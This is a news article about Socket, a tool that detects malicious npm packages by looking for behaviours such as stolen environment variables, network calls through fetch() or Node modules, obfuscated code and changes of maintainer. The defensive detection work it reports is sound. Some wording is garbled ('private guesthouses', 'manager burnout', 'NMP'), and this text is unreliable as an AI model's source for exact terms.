But its popularity has made it an attractive way to distribute malicious code, as compromised packages can reach a massive audience with minimal effort. WhiteSource, an Israel-based security company, claims to have detected and reported 1,300 malicious npm packages last year.
The Socket application aims to detect supply chain attacks before they cause damage. In an email to The registerFeross Aboukhadijeh, a prolific open source developer and founder of Socket, explained that attacks on the open source software supply chain have been getting worse since 2015 and he now sees them almost every week.
The situation has become serious enough, he said, that he finds it necessary to check open-source dependencies in Wormhole, a web-based file transfer application promising security through encryption. “I didn’t feel comfortable telling people to trust our service with their most valuable data when malware could hide in any dependency we update to a new version” , he explained.
Aboukhadijeh said the standard approach is to search for known vulnerabilities or flaws labeled CVE. But these types of programming errors take a long time to discover and surface in public reports, and finding and fixing these types of bugs is not on the same level as identifying deliberately compromised dependencies.
The 200 day gap
Pointing to a research paper from 2020 [PDF] who discovered that malware typically hides in hosted packages for 200 days before being detected, Aboukhadijeh said it was clear that bad packages need to be detected before they are integrated into developer applications.
For Wormhole, that meant auditing every open-source app package.
“Fortunately, most supply chain attacks follow a similar pattern (stealing environment variables, sending data over the network, etc.). So we built a tool that would have intercepted all recent attacks from NPM supply chain,” explained Aboukhadijeh. “The tool analyzes the actual behavior of the package instead of relying on outdated data in a CVE database.”
There are already a large number of vulnerability scanning and static analysis tools available. But according to Aboukhadijeh, these are failing to stop the supply chain attacks on NMP we have seen –
“Traditional vulnerability scanning tools simply look up the package versions you’re using and compare it to public CVE data from the National Vulnerability Database,” Aboukhadijeh said. “When they find a match, they send you an alert to upgrade to a new version.
Traditional static analysis tools are way too noisy when run on third-party code and don’t provide actionable results. Socket, on the other hand, is intended to provide useful advice.
Click to enlarge
The app scans for malware, typos, hidden/obfuscated/minified code, introduction of risky APIs (file system, network,
eval()) and suspicious updates. It currently supports 70 detections in five categories: supply chain risk, quality, maintenance, known vulnerabilities, and licensing issues.
“Socket uses static analysis (and soon, dynamic analysis) to characterize the behavior of a package and determine the capabilities it uses, which we call ‘capability detection,'” Aboukhadijeh said. “For example, to determine if an npm packet is using the network, Socket looks to see if `fetch()`, or the `net`, `dgram`, `dns`, or `http` or `https` modules of Node are used in the package or – and this part is essential – one of its dependencies. We also look for redundant signals, such as the presence URL or IP address fragments in the strings.
The app also examines what’s going on outside of the code in scanned packages, to detect, for example, attempts to stealthily acquire a popular package and then subvert it.
“Some of the most valuable safety signals come from secondary channels such as the behavior of officials,” Aboukhadijeh said. “Socket detects ‘ownership unstable’, i.e. when a new maintainer receives publish permission on a package. We also detect when packages are published out of order, as attackers often publish new fixes on older major releases that are still heavily used.”
It also looks for typo-squatting, which is submitting a package to NPM with a similar name to another package, hoping to trick developers into installing the malicious version.
Really open security
Aboukhadijeh said that those testing the app had already detected several instances of malware that they had reported and which NPM had removed.
“Beyond outright malware, Socket users have discovered an interesting new open source trend: some maintainers have begun to include telemetry in their packages to collect runtime usage statistics,” said Aboukhadijeh. “It’s similar to how websites include trackers like Google Analytics. We’ve already added detection in Socket for this issue so companies can detect and block telemetry from their open source. We’re keeping an eye on this. tendency.”
Aboukhadijeh said his company wants to open up Socket’s tools to security researchers looking for NPM malware and said those interested should get in touch.
A malicious NPM package disguised as a Twilio library for three days until eliminated
Socket is currently available as an integrated GitHub application – clicking the install button on the Socket website takes you to a GitHub authorization prompt. Once authorized, it runs with each pull request, evaluating changes to package manifest files such as package.json. When a new dependency is added, Socket evaluates it and leaves a comment if it is a security risk, Aboukhadijeh said.
There is a Socket CLI and an API in the pipeline. And the service is free for public repos, a benefit also available for private repos for a limited time. Socket package search and package health scores are available for free on the company’s website. Socket integrations, such as the GitHub app, are free for open source repositories, “forever,” we’re told. For private repositories, the service is free for the duration of beta testing. Pricing for private guesthouses after general availability has yet to be decided.
“In the coming weeks, we will be offering new detection for packages whose maintainers are using email addresses with expired domains, which is a huge risk factor for package hijacking,” Aboukhadijeh said. “We are also working on new signals such as manager reputation, manager burnout, and manager security practices (2FA enabled, code signing, published security policy).”
“Our goal is for Socket to provide the most comprehensive open source risk analysis on the market, which means analyzing the full picture – from maintainers and their behavior to open source codebases and their evolution.” ®